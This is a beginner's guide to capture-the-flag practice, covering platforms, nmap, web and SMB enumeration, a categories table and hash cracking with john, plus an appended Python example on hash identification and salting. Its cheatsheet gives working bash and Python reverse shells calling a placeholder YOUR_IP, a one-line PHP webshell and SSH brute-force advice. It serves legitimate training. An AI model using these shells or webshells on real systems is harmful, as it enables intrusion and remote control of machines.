Tags: CTF, HackTheBox, TryHackMe, Methodology, Web, Pwn, Forensics
Basic

CTF Methodology: Complete Beginner's Guide

Oct 1, 2024

CTF (Capture The Flag) competitions are cybersecurity events where you find "flags" (secret strings) by solving technical challenges. They are the best legal way to practise ethical hacking. This guide covers methodology, common categories, and essential tools.

1. Recommended Practice Platforms

# Guided rooms — best for beginners:
# https://tryhackme.com
# https://picoctf.org

# Solo machines — intermediate/advanced:
# https://hackthebox.com
# https://vulnhub.com
# https://pwn.college   (binary exploitation)

# Live competitions:
# https://ctftime.org   (global CTF calendar)

2. General Methodology for Machines (HTB/THM)

# Step 1 — Initial recon:
export IP=10.10.10.X
nmap -sV -sC -T4 $IP
nmap -p- --min-rate 5000 $IP

# Step 2 — Enumerate services by port:
# Port 80/443 → Web enumeration
# Port 21  → FTP (try anonymous login)
# Port 22  → SSH (brute force if username known)
# Port 445 → SMB (enum4linux, smbclient)

# Step 3 — Gain initial foothold
# Step 4 — Privilege escalation to root/system
# Step 5 — Capture flags: user.txt and root.txt

3. Web Enumeration (Most Common Category)

# Basic recon:
whatweb http://$IP
curl -I http://$IP
nikto -h http://$IP

# Directory and file discovery:
gobuster dir -u http://$IP \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,html,txt,bak -t 50

# Subdomain discovery:
echo "$IP  target.htb" | sudo tee -a /etc/hosts
gobuster dns -d target.htb \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Manual checks:
# View source (Ctrl+U)
# Check /robots.txt, /sitemap.xml, /.git/, /backup/
# Try default creds: admin/admin, admin/password

4. SMB Enumeration (Windows)

# Enumerate with enum4linux-ng:
enum4linux-ng -A $IP

# List shares:
smbclient -L //$IP -N
smbclient //$IP/SHARE -N

# With crackmapexec:
crackmapexec smb $IP --shares -u '' -p ''

# Mount share locally:
sudo mount -t cifs //$IP/Data /mnt/smb -o username=,password=

5. Reverse Shells Cheatsheet

# Listen on attacker machine:
nc -lvnp 4444
rlwrap nc -lvnp 4444    # With command history

# Bash reverse shell:
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

# Python:
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# PHP webshell (RCE):
<?php system($_GET["cmd"]); ?>

# Upgrade basic shell to full TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

6. CTF Categories & Tools

| Category      | Description                              | Key Tools                      |
|---------------|------------------------------------------|--------------------------------|
| Web           | SQLi, XSS, IDOR, SSRF, path traversal    | Burp Suite, sqlmap, ffuf       |
| Cryptography  | Classic ciphers, weak RSA, hash cracking | CyberChef, john, hashcat       |
| Reversing     | Binary analysis, decompilation           | Ghidra, IDA Free, radare2      |
| Pwn/Binary    | Buffer overflow, ret2libc, ROP chains    | pwntools, gdb-peda, ROPgadget  |
| Forensics     | Disk images, network captures, memory    | Volatility, Autopsy, Wireshark |
| OSINT         | Passive recon, social media              | theHarvester, Shodan, Maltego  |
| Steganography | Hidden data in images/audio              | steghide, stegseek, zsteg      |

7. CTF Tips & Best Practices

# Always take notes:
mkdir ~/ctf/machine && cd ~/ctf/machine
nano notes.md

# Find flags (Linux):
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

# CyberChef for suspicious strings:
# https://gchq.github.io/CyberChef/
# Useful for: base64, hex, ROT13, URL encode, JWT...

# Identify hash type:
hash-identifier "5f4dcc3b5aa765d61d8327deb882cf99"
hashid "5f4dcc3b5aa765d61d8327deb882cf99"

# Crack hashes:
echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
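An added example, not part of the original cheatsheet, of what hashid and john are doing in the commands above: classify an unsalted hex digest by its length, then run a dictionary check against a wordlist. The five-word wordlist and the salt are constructed stand-ins for rockyou.txt and a real per-user salt; the last function shows why the same check fails once a salt is in play.

```python
import hashlib
import re
from typing import List, Optional, Tuple

# Constructed stand-in for rockyou.txt (assumption: a handful of common passwords).
WORDLIST = ["123456", "letmein", "password", "qwerty", "admin"]

# Hex-digest length -> candidate unsalted algorithms. This is the same heuristic
# hashid/hash-identifier use: length alone cannot tell MD5 from other 128-bit
# digests, so the result is a list of candidates, not a certainty.
LENGTH_TO_ALGOS = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def identify_hash(digest: str) -> List[str]:
    """Return candidate algorithm names for an unsalted hex digest, [] if unrecognised."""
    if not HEX_RE.match(digest):
        return []
    return LENGTH_TO_ALGOS.get(len(digest), [])


def wordlist_check(digest: str, wordlist: List[str] = WORDLIST) -> Optional[Tuple[str, str]]:
    """Dictionary check: hash every word with every candidate algorithm and compare.

    Returns (algorithm, word) on a match, None otherwise. With an unsalted fast
    hash this is exactly why `john --wordlist=rockyou.txt` finishes instantly.
    """
    target = digest.lower()
    for algo in identify_hash(digest):
        for word in wordlist:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return algo, word
    return None


def salted_sha256(word: str, salt: str) -> str:
    """Same password, but salted (constructed salt): the digest still looks like
    SHA-256 to identify_hash, yet the plain wordlist check no longer matches it."""
    return hashlib.sha256(salt.encode() + word.encode()).hexdigest()


if __name__ == "__main__":
    print(wordlist_check("5f4dcc3b5aa765d61d8327deb882cf99"))   # ('md5', 'password')
    print(wordlist_check(salted_sha256("password", "s4lt")))     # None
```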